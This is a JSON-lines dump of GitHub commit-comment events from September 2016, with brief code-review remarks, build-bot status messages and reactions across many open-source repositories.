{"id":"4556227962","type":"CommitCommentEvent","actor":{"login":"drewpitchford"},"repo":{"name":"metova/DataManager"},"payload":{"comment":{"id":19003195,"position":5,"line":11,"path":"Tests/MethodSwizzling.swift","commit_id":"efc9cfe4cc0f7ef4a954d052936e090ddd0d40e6","created_at":"2016-09-13T15:09:56Z","updated_at":"2016-09-13T15:09:56Z","body":"I would have done\r\n`func swizzle(original selector:Selector, with newSelector:Selector, for class:AnyClass)`\r\n\r\nEither way works of course, I guess I'm trying to find balance in making it a nice read at the call as well as just on its own."}},"created_at":"2016-09-13T15:09:56Z"}
{"id":"4556228312","type":"CommitCommentEvent","actor":{"login":"bendlas"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":19003196,"position":null,"line":null,"path":null,"commit_id":"d1bf595cc57be0cafecfd12f2ce4e35cbc1211bd","created_at":"2016-09-13T15:10:00Z","updated_at":"2016-09-13T15:10:00Z","body":"Why didn't you merge the older and more complete https://github.com/NixOS/nixpkgs/pull/18450 ?"}},"created_at":"2016-09-13T15:10:00Z"}
{"id":"4556228868","type":"CommitCommentEvent","actor":{"login":"zpnaruto"},"repo":{"name":"zpnaruto/node-angular-community"},"payload":{"comment":{"id":19003198,"position":null,"line":null,"path":null,"commit_id":"d7c88af3d9387a682e6c883b066e5cee50204cec","created_at":"2016-09-13T15:10:06Z","updated_at":"2016-09-13T15:10:06Z","body":"html and css and js"}},"created_at":"2016-09-13T15:10:06Z"}
{"id":"4556233014","type":"CommitCommentEvent","actor":{"login":"stevejberry"},"repo":{"name":"Slind14/Wiki"},"payload":{"comment":{"id":19003204,"position":21,"line":64,"path":"docs/source/Launcher/index.rst","commit_id":"f98848b49f1a16d87d277839a74ae4c2a7cab5ed","created_at":"2016-09-13T15:10:44Z","updated_at":"2016-09-13T15:10:44Z","body":"new New or Original - unknown - Filename is mymlauncher.jar \r\n\r\nI belive they edited the filename for some reason - possibly a new build. \r\n"}},"created_at":"2016-09-13T15:10:44Z"}
{"id":"4556233873","type":"CommitCommentEvent","actor":{"login":"lgauthier"},"repo":{"name":"metova/DataManager"},"payload":{"comment":{"id":19003205,"position":5,"line":11,"path":"Tests/MethodSwizzling.swift","commit_id":"efc9cfe4cc0f7ef4a954d052936e090ddd0d40e6","created_at":"2016-09-13T15:10:52Z","updated_at":"2016-09-13T15:10:52Z","body":"+1 @drewpitchford Yea, that's way better."}},"created_at":"2016-09-13T15:10:52Z"}
{"id":"4556235664","type":"CommitCommentEvent","actor":{"login":"moricim"},"repo":{"name":"moricim/hello-world"},"payload":{"comment":{"id":19003209,"position":null,"line":null,"path":null,"commit_id":"f7ea1c37ae89b7f57d68475358ca25743a88d3e4","created_at":"2016-09-13T15:11:11Z","updated_at":"2016-09-13T15:11:11Z","body":"@jbochanski"}},"created_at":"2016-09-13T15:11:11Z"}
{"id":"4556236305","type":"CommitCommentEvent","actor":{"login":"astitva1995"},"repo":{"name":"astitva1995/Draftify"},"payload":{"comment":{"id":19003210,"position":null,"line":null,"path":null,"commit_id":"720cbbfb1b246ea4499067a7096b1e3ed0b4ba1f","created_at":"2016-09-13T15:11:17Z","updated_at":"2016-09-13T15:11:17Z","body":"@dollysree @suhaivms Think about improving the representation of information under 'SAC INFO' tab's first accordion, i.e. 'SAC OFFICE BEARERS', the data looks too congested when all four societies are displayed together side-by-side. Think of some different layout which doesn't look congested. Take ideas from other pages of the website, like \"Hall Info\" (Although, its style of representation also needs to be changed slightly. Think about it also.)"}},"created_at":"2016-09-13T15:11:17Z"}
{"id":"4556237702","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19003213,"position":null,"line":null,"path":null,"commit_id":"b7679c14d0486c8488b932cc6a9ca65b51601106","created_at":"2016-09-13T15:11:30Z","updated_at":"2016-09-13T15:11:30Z","body":"os_2_0_develop_linux (macumber) - Win64-Windows-7-VisualStudio-12: Tests Failed (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-b7679c14d0486c8488b932cc6a9ca65b51601106-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-b7679c14d0486c8488b932cc6a9ca65b51601106-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-13T15:11:30Z"}
{"id":"4556238068","type":"CommitCommentEvent","actor":{"login":"loosebazooka"},"repo":{"name":"GoogleCloudPlatform/appengine-plugins-core"},"payload":{"comment":{"id":19003214,"position":null,"line":null,"path":null,"commit_id":"3cee690a355cf3b9b32ee37579647bafc42061b1","created_at":"2016-09-13T15:11:34Z","updated_at":"2016-09-13T15:11:34Z","body":":ski: :surfer: :shipit: "}},"created_at":"2016-09-13T15:11:34Z"}
{"id":"4556239585","type":"CommitCommentEvent","actor":{"login":"thelastbaldwin"},"repo":{"name":"lisabee2/final_project"},"payload":{"comment":{"id":19003216,"position":5,"line":5,"path":"final_LL/contact/js/contact.js","commit_id":"ede6ccf50676ac2255f669e7fee5e7b995207b05","created_at":"2016-09-13T15:11:47Z","updated_at":"2016-09-13T15:11:47Z","body":"let is an ES6 feature that is not supported well yet. I definitely recommend getting familiar with this stuff, but to safely use it in the browser you need to incorporate a build step into your development workflow to translate this down to ES5. This is outside the scope of this class but google a library called Babel if you want to learn more. "}},"created_at":"2016-09-13T15:11:47Z"}
{"id":"4556241732","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19003229,"position":null,"line":null,"path":null,"commit_id":"b7679c14d0486c8488b932cc6a9ca65b51601106","created_at":"2016-09-13T15:12:09Z","updated_at":"2016-09-13T15:12:09Z","body":"os_2_0_develop_linux (macumber) - x86_64-MacOS-10.10-clang: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-b7679c14d0486c8488b932cc6a9ca65b51601106-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-b7679c14d0486c8488b932cc6a9ca65b51601106-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-13T15:12:09Z"}
{"id":"4556242337","type":"CommitCommentEvent","actor":{"login":"ddunbar"},"repo":{"name":"aciidb0mb3r/swift-package-manager"},"payload":{"comment":{"id":19003233,"position":13,"line":208,"path":"Sources/SourceControl/GitRepository.swift","commit_id":"09911a649008defe2fd93426778865afa74fcc34","created_at":"2016-09-13T15:12:15Z","updated_at":"2016-09-13T15:12:15Z","body":"org.swift plz :)"}},"created_at":"2016-09-13T15:12:15Z"}
{"id":"4556244386","type":"CommitCommentEvent","actor":{"login":"awhiemstra"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":19003239,"position":12,"line":243,"path":"resources/qml/SidebarHeader.qml","commit_id":"ec587eb0dd76aa88178c6f923e94c08ab09b0ae2","created_at":"2016-09-13T15:12:35Z","updated_at":"2016-09-13T15:12:35Z","body":"Would it not make more sense to turn this around and simply do this:\r\n\r\n```\r\nif(data == \"False\")\r\n{ \r\n    return true\r\n}\r\nreturn false\r\n```\r\n\r\nI am assuming here that the \"False\" condition is the primary case and if there is no data you want to keep it marked as \"compatible\".\r\n\r\n"}},"created_at":"2016-09-13T15:12:35Z"}
{"id":"4556245752","type":"CommitCommentEvent","actor":{"login":"KillianDavitt"},"repo":{"name":"KillianDavitt/ClassCloud"},"payload":{"comment":{"id":19003241,"position":61,"line":61,"path":"classcloud.py","commit_id":"70e644ae0b5e30ab5eb703ce708b96db003d01af","created_at":"2016-09-13T15:12:47Z","updated_at":"2016-09-13T15:12:47Z","body":"@barischj The former adds 'files' as a key to the outputted json, whereas the latter doesn't.\r\n\r\neg.\r\n\r\n{\r\n'files':\r\n    [ 'test.txt', 'other_test.txt']\r\n}\r\n\r\ninstead of\r\n\r\n{\r\n    ['test.txt', 'other_test.txt']\r\n}"}},"created_at":"2016-09-13T15:12:47Z"}
{"id":"4556247126","type":"CommitCommentEvent","actor":{"login":"ddunbar"},"repo":{"name":"aciidb0mb3r/swift-package-manager"},"payload":{"comment":{"id":19003244,"position":9,"line":204,"path":"Sources/SourceControl/GitRepository.swift","commit_id":"09911a649008defe2fd93426778865afa74fcc34","created_at":"2016-09-13T15:12:59Z","updated_at":"2016-09-13T15:12:59Z","body":"We can document this class as thread safe now."}},"created_at":"2016-09-13T15:12:59Z"}
{"id":"4556248268","type":"CommitCommentEvent","actor":{"login":"zpnaruto"},"repo":{"name":"zpnaruto/node-angular-community"},"payload":{"comment":{"id":19003248,"position":null,"line":null,"path":null,"commit_id":"aa9046fe872521d5d6a9479c4ef2df4637078bb7","created_at":"2016-09-13T15:13:11Z","updated_at":"2016-09-13T15:13:11Z","body":"server"}},"created_at":"2016-09-13T15:13:11Z"}
{"id":"4556250242","type":"CommitCommentEvent","actor":{"login":"laz2727"},"repo":{"name":"Vazkii/Botania"},"payload":{"comment":{"id":19003250,"position":27,"line":27,"path":"src/main/java/vazkii/botania/common/item/ItemRegenIvy.java","commit_id":"1edbc41b12d37144cdfa914a8cbcb6bf0aa5e729","created_at":"2016-09-13T15:13:29Z","updated_at":"2016-09-13T15:13:29Z","body":"That's rather sad."}},"created_at":"2016-09-13T15:13:29Z"}
{"id":"4556252223","type":"CommitCommentEvent","actor":{"login":"huangleiji"},"repo":{"name":"huangleiji/HLJLH"},"payload":{"comment":{"id":19003254,"position":5,"line":4,"path":"自动作曲第一章改综述.md","commit_id":"eeb3d719ae4ce02579e84ce83ce7d5918a866248","created_at":"2016-09-13T15:13:46Z","updated_at":"2016-09-13T15:13:46Z","body":"傻逼"}},"created_at":"2016-09-13T15:13:46Z"}
{"id":"4556255570","type":"CommitCommentEvent","actor":{"login":"vitorbaptista"},"repo":{"name":"georgiana-b/api"},"payload":{"comment":{"id":19003262,"position":null,"line":null,"path":null,"commit_id":"90c8c6f9ff5365fa71f9da8c320a729c5d8c9169","created_at":"2016-09-13T15:14:16Z","updated_at":"2016-09-13T15:14:16Z","body":"There're a few issues arising from the weird plurals. For example, even though I know `risks_of_bias` is the correct plural for `risk_of_bias`, it's very easy to overlook the difference. In this case, I would argue that it's best to use `risk_of_biases`, which reads very wrong, but is easier to spot.\r\n\r\nI would say the same for `criterion` vs `criteria` (i.e. use `criterias`)."}},"created_at":"2016-09-13T15:14:16Z"}
{"id":"4556257723","type":"CommitCommentEvent","actor":{"login":"rphmeier"},"repo":{"name":"ethcore/parity"},"payload":{"comment":{"id":19003265,"position":4,"line":4,"path":"script/deploy.sh","commit_id":"a8724848917076a63edb736e05b62fe84496864e","created_at":"2016-09-13T15:14:35Z","updated_at":"2016-09-13T15:14:35Z","body":"this should be in `scripts/` not `script/`"}},"created_at":"2016-09-13T15:14:35Z"}
{"id":"4556258377","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19003266,"position":null,"line":null,"path":null,"commit_id":"46c8a7769ea3f7406724c4e130f2ead6f0fd2b40","created_at":"2016-09-13T15:14:40Z","updated_at":"2016-09-13T15:14:40Z","body":"os_2.0_develop_signal_slot_bug (kbenne) - x86_64-MacOS-10.10-clang: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-46c8a7769ea3f7406724c4e130f2ead6f0fd2b40-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-46c8a7769ea3f7406724c4e130f2ead6f0fd2b40-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-13T15:14:40Z"}
{"id":"4556260381","type":"CommitCommentEvent","actor":{"login":"php-coder"},"repo":{"name":"kubernetes/kubernetes"},"payload":{"comment":{"id":19003268,"position":19,"line":139,"path":"examples/experimental/persistent-volume-provisioning/README.md","commit_id":"5445ccf4cbc8aa5794e125f1b66dcc16ae4a9572","created_at":"2016-09-13T15:14:57Z","updated_at":"2016-09-13T15:14:57Z","body":"This YAML looks formatted improperly after rendering: https://github.com/kubernetes/kubernetes/blob/master/examples/experimental/persistent-volume-provisioning/README.md#ceph-rbd"}},"created_at":"2016-09-13T15:14:57Z"}
{"id":"4556261855","type":"CommitCommentEvent","actor":{"login":"pjmorse"},"repo":{"name":"dmcouncil/ember-bootstrap-time-input-group"},"payload":{"comment":{"id":19003274,"position":null,"line":null,"path":null,"commit_id":"fa431eeb8d6f2ccc0b81a1375b290980aadf850c","created_at":"2016-09-13T15:15:14Z","updated_at":"2016-09-13T15:15:14Z","body":"Have you pushed this to npm? "}},"created_at":"2016-09-13T15:15:14Z"}
{"id":"4556261917","type":"CommitCommentEvent","actor":{"login":"juangutierrezalvarez"},"repo":{"name":"juangutierrezalvarez/UPACYL"},"payload":{"comment":{"id":19003275,"position":null,"line":null,"path":null,"commit_id":"5be874240c5809cd6aaa9eddcd115adf966c401c","created_at":"2016-09-13T15:15:14Z","updated_at":"2016-09-13T15:15:14Z","body":"commit inicial"}},"created_at":"2016-09-13T15:15:14Z"}
{"id":"4556263538","type":"CommitCommentEvent","actor":{"login":"parente"},"repo":{"name":"danielballan/nbexamples"},"payload":{"comment":{"id":19003282,"position":null,"line":null,"path":null,"commit_id":"e7ae7e6bc4d5011155a4bb961b861bd2447bcdb2","created_at":"2016-09-13T15:15:29Z","updated_at":"2016-09-13T15:15:29Z","body":"Can you push this tag? I don't see it on GitHub."}},"created_at":"2016-09-13T15:15:29Z"}
{"id":"4556270396","type":"CommitCommentEvent","actor":{"login":"linkaicheng"},"repo":{"name":"linkaicheng/WeatherSchedule"},"payload":{"comment":{"id":19003300,"position":2,"line":2,"path":"README.md","commit_id":"d2b9be2ac34ccd309f1a862b3a0eb3e36ba62a59","created_at":"2016-09-13T15:16:28Z","updated_at":"2016-09-13T15:16:28Z","body":"![screenshot_2016-09-13-23-06-35](https://cloud.githubusercontent.com/assets/18362739/18479540/fe16be04-7a07-11e6-888c-995054f9cb5c.jpeg)\r\n![screenshot_2016-09-13-23-06-55](https://cloud.githubusercontent.com/assets/18362739/18479542/fe2220aa-7a07-11e6-9f79-9efaeb36f7f7.jpeg)\r\n![screenshot_2016-09-13-23-09-11](https://cloud.githubusercontent.com/assets/18362739/18479537/fe08c740-7a07-11e6-994f-d5d458dad4ea.jpeg)\r\n![screenshot_2016-09-13-23-09-25](https://cloud.githubusercontent.com/assets/18362739/18479539/fe0fffa6-7a07-11e6-8d39-1409342944b9.jpeg)\r\n![screenshot_2016-09-13-23-09-36](https://cloud.githubusercontent.com/assets/18362739/18479543/fe247562-7a07-11e6-8eb3-eea550bb5ad2.jpeg)\r\n![screenshot_2016-09-13-23-09-58](https://cloud.githubusercontent.com/assets/18362739/18479538/fe0a5542-7a07-11e6-8e4e-4ddfb3e4a326.jpeg)\r\n"}},"created_at":"2016-09-13T15:16:28Z"}
{"id":"4556272770","type":"CommitCommentEvent","actor":{"login":"awhiemstra"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":19003306,"position":8,"line":89,"path":"plugins/CuraEngineBackend/StartSliceJob.py","commit_id":"677d6556fbde47971fb7b4da8112b7d4d1f0312b","created_at":"2016-09-13T15:16:48Z","updated_at":"2016-09-13T15:16:48Z","body":"Rather than abuse SettingError for this, why not add a MaterialIncompatible result code and use that to re-display the message added in 2441275f2972db33a34fc2d19851ad64e3575d39 ? That way a user will be informed about this instead of getting a generic \"setting error\" message."}},"created_at":"2016-09-13T15:16:48Z"}
{"id":"4556272835","type":"CommitCommentEvent","actor":{"login":"Scrxtchy"},"repo":{"name":"ShareX/ShareX"},"payload":{"comment":{"id":19003307,"position":4,"line":67,"path":"ShareX.HelpersLib/Helpers/Helpers.cs","commit_id":"557cd0e08e1e44e93fac7188605e72b7d6cea8a1","created_at":"2016-09-13T15:16:48Z","updated_at":"2016-09-13T15:16:48Z","body":"does .NET not have mime type checking?"}},"created_at":"2016-09-13T15:16:48Z"}
{"id":"4556274106","type":"CommitCommentEvent","actor":{"login":"pkazzer"},"repo":{"name":"LiliSync/SparkAdvancedAnalytics"},"payload":{"comment":{"id":19003309,"position":null,"line":null,"path":null,"commit_id":"71414d031d85bf9b8ec745ef7f66fff80c4676a9","created_at":"2016-09-13T15:17:01Z","updated_at":"2016-09-13T15:17:01Z","body":"super"}},"created_at":"2016-09-13T15:17:01Z"}
{"id":"4556276028","type":"CommitCommentEvent","actor":{"login":"wshxbqq"},"repo":{"name":"wshxbqq/jdf"},"payload":{"comment":{"id":19003311,"position":null,"line":null,"path":null,"commit_id":"ee00ba95a24dd2d85b817278af07f2de6e546fef","created_at":"2016-09-13T15:17:20Z","updated_at":"2016-09-13T15:17:20Z","body":"auto"}},"created_at":"2016-09-13T15:17:20Z"}
{"id":"4556278245","type":"CommitCommentEvent","actor":{"login":"pjmorse"},"repo":{"name":"dmcouncil/ember-bootstrap-time-input-group"},"payload":{"comment":{"id":19003322,"position":null,"line":null,"path":null,"commit_id":"5c687dc73b62e37dc777686663405e0ce98c6353","created_at":"2016-09-13T15:17:39Z","updated_at":"2016-09-13T15:17:39Z","body":"This is 👍 as far as I can see. I've set up TravisCI on the repo just for giggles, but I might need to tweak the `travis.yml`. Have you pushed this to NPM? Do you want to? It would make installing it in our projects simpler."}},"created_at":"2016-09-13T15:17:39Z"}
{"id":"4556278848","type":"CommitCommentEvent","actor":{"login":"thelastbaldwin"},"repo":{"name":"lisabee2/final_project"},"payload":{"comment":{"id":19003324,"position":null,"line":null,"path":null,"commit_id":"ede6ccf50676ac2255f669e7fee5e7b995207b05","created_at":"2016-09-13T15:17:44Z","updated_at":"2016-09-13T15:17:44Z","body":"This satisfies the assignment but your form needs a lot of cleanup. Remove ALL of the ul's and li's from it and fix the styling. I suspect that the validation JS is copy pasted from somewhere. This itself isn't a bad thing, since you should be comfortable using other folks' code. However, having big chunks of code that you don't fully understand can result in infuriating errors later down the line. In this case, your code will probably work fine in Chrome and Firefox, but will definitely fail in IE, Edge and Safari. "}},"created_at":"2016-09-13T15:17:44Z"}
{"id":"4556279333","type":"CommitCommentEvent","actor":{"login":"smartclash"},"repo":{"name":"oltmannsdaniel/skeleton-plus"},"payload":{"comment":{"id":19003327,"position":null,"line":null,"path":null,"commit_id":"abb6d37e9c05b5cfda49eeeae44dbedc56a9cedc","created_at":"2016-09-13T15:17:49Z","updated_at":"2016-09-13T15:17:49Z","body":"@oltmannsdaniel Actually the shadow concept was taken from Material Design Project by Google. Check it out at https://getmdl.io/ That's why i called it Material."}},"created_at":"2016-09-13T15:17:49Z"}
{"id":"4556282108","type":"CommitCommentEvent","actor":{"login":"vishalnayak"},"repo":{"name":"hashicorp/vault"},"payload":{"comment":{"id":19003335,"position":null,"line":null,"path":null,"commit_id":"8896a7079ab93db3d9a397670d30ee2d58e1a65a","created_at":"2016-09-13T15:18:16Z","updated_at":"2016-09-13T15:18:16Z","body":":heart_eyes: "}},"created_at":"2016-09-13T15:18:16Z"}
{"id":"4556282843","type":"CommitCommentEvent","actor":{"login":"ddunbar"},"repo":{"name":"aciidb0mb3r/swift-package-manager"},"payload":{"comment":{"id":19003337,"position":7,"line":17,"path":"Sources/SourceControl/CheckoutManager.swift","commit_id":"7cf32d51594878687a70342b9e90223249b8144a","created_at":"2016-09-13T15:18:23Z","updated_at":"2016-09-13T15:18:23Z","body":"I'm not sure we should expose the path, since it is intended to be an implementation detail, but it's probably fine to leave for now."}},"created_at":"2016-09-13T15:18:23Z"}
{"id":"4556284100","type":"CommitCommentEvent","actor":{"login":"sev-"},"repo":{"name":"peterkohaut/scummvm"},"payload":{"comment":{"id":19003340,"position":null,"line":null,"path":null,"commit_id":"a51691ce37664fd8300a60206b5e7bd2b98e27f7","created_at":"2016-09-13T15:18:34Z","updated_at":"2016-09-13T15:18:34Z","body":"Shouldn't we start for preparing the merge so the work could be continued in-tree?"}},"created_at":"2016-09-13T15:18:34Z"}
{"id":"4556285959","type":"CommitCommentEvent","actor":{"login":"dolpo04"},"repo":{"name":"rgmf/2bach"},"payload":{"comment":{"id":19003344,"position":null,"line":null,"path":null,"commit_id":"b560a45adc69bcca1a7195fdee3f45c3eda0a495","created_at":"2016-09-13T15:18:50Z","updated_at":"2016-09-13T15:18:50Z","body":"Inicio del tema, sin acabar"}},"created_at":"2016-09-13T15:18:50Z"}
{"id":"4556286380","type":"CommitCommentEvent","actor":{"login":"jefferai"},"repo":{"name":"hashicorp/vault"},"payload":{"comment":{"id":19003346,"position":null,"line":null,"path":null,"commit_id":"8896a7079ab93db3d9a397670d30ee2d58e1a65a","created_at":"2016-09-13T15:18:54Z","updated_at":"2016-09-13T15:18:54Z","body":"hahaha!"}},"created_at":"2016-09-13T15:18:54Z"}
{"id":"4556288736","type":"CommitCommentEvent","actor":{"login":"Wexcode"},"repo":{"name":"trevorcai/react-starter"},"payload":{"comment":{"id":19003354,"position":4,"line":25,"path":"package.json","commit_id":"f8df214947a66842c09d6a9fdb78ae4b7606d72e","created_at":"2016-09-13T15:19:18Z","updated_at":"2016-09-13T15:19:18Z","body":"Don't forget to add this to your `webpack.vendor.js`"}},"created_at":"2016-09-13T15:19:18Z"}
{"id":"4556291114","type":"CommitCommentEvent","actor":{"login":"nallath"},"repo":{"name":"sedwards2009/cura-god-mode-plugin"},"payload":{"comment":{"id":19003361,"position":1,"line":1,"path":"src/GodMode/GodMode.py","commit_id":"539b273a3e059979b255af08e883696f5ae13c81","created_at":"2016-09-13T15:19:38Z","updated_at":"2016-09-13T15:19:38Z","body":"I'm assuming that you own copyright to this and not Ultimaker ;) "}},"created_at":"2016-09-13T15:19:38Z"}
{"id":"4556292317","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19003365,"position":null,"line":null,"path":null,"commit_id":"8c8f90c5689ada937dbb1846791727a705752d3d","created_at":"2016-09-13T15:19:49Z","updated_at":"2016-09-13T15:19:49Z","body":"ASIHPValidation (shenb) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8c8f90c5689ada937dbb1846791727a705752d3d-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-13T15:19:49Z"}
{"id":"4556298387","type":"CommitCommentEvent","actor":{"login":"ddunbar"},"repo":{"name":"aciidb0mb3r/swift-package-manager"},"payload":{"comment":{"id":19003377,"position":20,"line":48,"path":"Sources/Commands/Workspace.swift","commit_id":"3cd0df9c59ad53aba3ecd1bc2c31455eed5ecce4","created_at":"2016-09-13T15:20:43Z","updated_at":"2016-09-13T15:20:43Z","body":"This should be 'unowned' I think."}},"created_at":"2016-09-13T15:20:43Z"}
{"id":"4556298629","type":"CommitCommentEvent","actor":{"login":"Wexcode"},"repo":{"name":"trevorcai/react-starter"},"payload":{"comment":{"id":19003379,"position":10,"line":6,"path":"ui/reducer.js","commit_id":"f8df214947a66842c09d6a9fdb78ae4b7606d72e","created_at":"2016-09-13T15:20:45Z","updated_at":"2016-09-13T15:20:45Z","body":"    movies: new Immutable.List(),"}},"created_at":"2016-09-13T15:20:45Z"}
{"id":"4556300156","type":"CommitCommentEvent","actor":{"login":"nallath"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":19003384,"position":null,"line":null,"path":null,"commit_id":"31b0f748744b1bc957ab74ea5bdffa18a830935d","created_at":"2016-09-13T15:20:59Z","updated_at":"2016-09-13T15:20:59Z","body":"That seems like a better idea yeah."}},"created_at":"2016-09-13T15:20:59Z"}
{"id":"4556300348","type":"CommitCommentEvent","actor":{"login":"stevejberry"},"repo":{"name":"Slind14/Wiki"},"payload":{"comment":{"id":19003385,"position":39,"line":81,"path":"docs/source/Launcher/index.rst","commit_id":"f98848b49f1a16d87d277839a74ae4c2a7cab5ed","created_at":"2016-09-13T15:21:01Z","updated_at":"2016-09-13T15:21:01Z","body":"this is not necessary if archive mounter loads this file, you can copy/paste that. we should suggest the built in application \r\n\r\nArchive Mounter, or explain both . \r\n"}},"created_at":"2016-09-13T15:21:01Z"}
{"id":"4556301252","type":"CommitCommentEvent","actor":{"login":"oltmannsdaniel"},"repo":{"name":"oltmannsdaniel/skeleton-plus"},"payload":{"comment":{"id":19003387,"position":null,"line":null,"path":null,"commit_id":"abb6d37e9c05b5cfda49eeeae44dbedc56a9cedc","created_at":"2016-09-13T15:21:11Z","updated_at":"2016-09-13T15:21:11Z","body":"I want to keep the flat style. And Wiki is now enabled.\r\n"}},"created_at":"2016-09-13T15:21:11Z"}
{"id":"4556302339","type":"CommitCommentEvent","actor":{"login":"nallath"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":19003389,"position":7,"line":238,"path":"resources/qml/SidebarHeader.qml","commit_id":"ec587eb0dd76aa88178c6f923e94c08ab09b0ae2","created_at":"2016-09-13T15:21:21Z","updated_at":"2016-09-13T15:21:21Z","body":"it does :)"}},"created_at":"2016-09-13T15:21:21Z"}
{"id":"4556302889","type":"CommitCommentEvent","actor":{"login":"GarethOates"},"repo":{"name":"duffers20/Angular2-Template"},"payload":{"comment":{"id":19003393,"position":null,"line":null,"path":null,"commit_id":"d25811380b417b37c0ea679e4e705257de462d93","created_at":"2016-09-13T15:21:26Z","updated_at":"2016-09-13T15:21:26Z","body":"Nice! 👍🏻"}},"created_at":"2016-09-13T15:21:26Z"}
{"id":"4556303381","type":"CommitCommentEvent","actor":{"login":"stevejberry"},"repo":{"name":"Slind14/Wiki"},"payload":{"comment":{"id":19003395,"position":60,"line":96,"path":"docs/source/Launcher/index.rst","commit_id":"f98848b49f1a16d87d277839a74ae4c2a7cab5ed","created_at":"2016-09-13T15:21:30Z","updated_at":"2016-09-13T15:21:30Z","body":"this script needs to change to reflect new filename. \r\n"}},"created_at":"2016-09-13T15:21:30Z"}
{"id":"4556303763","type":"CommitCommentEvent","actor":{"login":"Wexcode"},"repo":{"name":"trevorcai/react-starter"},"payload":{"comment":{"id":19003396,"position":null,"line":null,"path":null,"commit_id":"f8df214947a66842c09d6a9fdb78ae4b7606d72e","created_at":"2016-09-13T15:21:33Z","updated_at":"2016-09-13T15:21:33Z","body":"👏 "}},"created_at":"2016-09-13T15:21:33Z"}
{"id":"4556308846","type":"CommitCommentEvent","actor":{"login":"ihnorton"},"repo":{"name":"Slicer/Slicer"},"payload":{"comment":{"id":19003411,"position":68,"line":911,"path":"Libs/MRML/Core/vtkMRMLStorageNode.cxx","commit_id":"cfdf8cc590450e5bcbe13b75c9cc6a9b5019883e","created_at":"2016-09-13T15:22:21Z","updated_at":"2016-09-13T15:22:21Z","body":"> Multiple dots handling is very important\r\n\r\nI think changing `find_last_of` to `find_first_of` should be sufficient for the special case.\r\n\r\n>  Also, please change all cases where a bare extension is added to SupportedReadFileTypes. \r\n\r\nOk. I'll make a PR with this and the other change, pending your fix for the All Files issue.\r\n\r\n> Could you also check what happens in the add data dialog in case of bare extension is specified \r\n\r\nDo you mind to clarify what to check here? After my change \"it works again\" -- FreeSurfer (e.g. `.pial`) files load properly as \"Model\" from the dialog. The string that is displayed in the dialog comes from the `q*Reader` class, e.g. `qSlicerModelsReader.cxx`, so I don't immediately see a relationship between the SupportedFileTypes and the dialog."}},"created_at":"2016-09-13T15:22:21Z"}
{"id":"4556309314","type":"CommitCommentEvent","actor":{"login":"ljharb"},"repo":{"name":"airbnb/enzyme"},"payload":{"comment":{"id":19003414,"position":5,"line":387,"path":"test/ReactWrapper-spec.jsx","commit_id":"cf467a0ef9644dfe8767db75de47b4edffe8dcbb","created_at":"2016-09-13T15:22:24Z","updated_at":"2016-09-13T15:22:24Z","body":"Wait, why are we skipping these tests?"}},"created_at":"2016-09-13T15:22:24Z"}
{"id":"4556309486","type":"CommitCommentEvent","actor":{"login":"stevejberry"},"repo":{"name":"Slind14/Wiki"},"payload":{"comment":{"id":19003415,"position":63,"line":99,"path":"docs/source/Launcher/index.rst","commit_id":"f98848b49f1a16d87d277839a74ae4c2a7cab5ed","created_at":"2016-09-13T15:22:26Z","updated_at":"2016-09-13T15:22:26Z","body":"i'm not sure why i made this file with sudo, the file is loaded by the userid, in the personal folder of Programs, and from the .local folder in the home folder. \r\n\r\nwe don't need to make this file as sudo (root) managed anymore. \r\n"}},"created_at":"2016-09-13T15:22:26Z"}
{"id":"4556310895","type":"CommitCommentEvent","actor":{"login":"smartclash"},"repo":{"name":"oltmannsdaniel/skeleton-plus"},"payload":{"comment":{"id":19003418,"position":null,"line":null,"path":null,"commit_id":"abb6d37e9c05b5cfda49eeeae44dbedc56a9cedc","created_at":"2016-09-13T15:22:38Z","updated_at":"2016-09-13T15:22:38Z","body":"@oltmannsdaniel Thanks. I will be sending an email to daniel@thedcdesigns.com from my email. Please share the skype ID if you would like to."}},"created_at":"2016-09-13T15:22:38Z"}
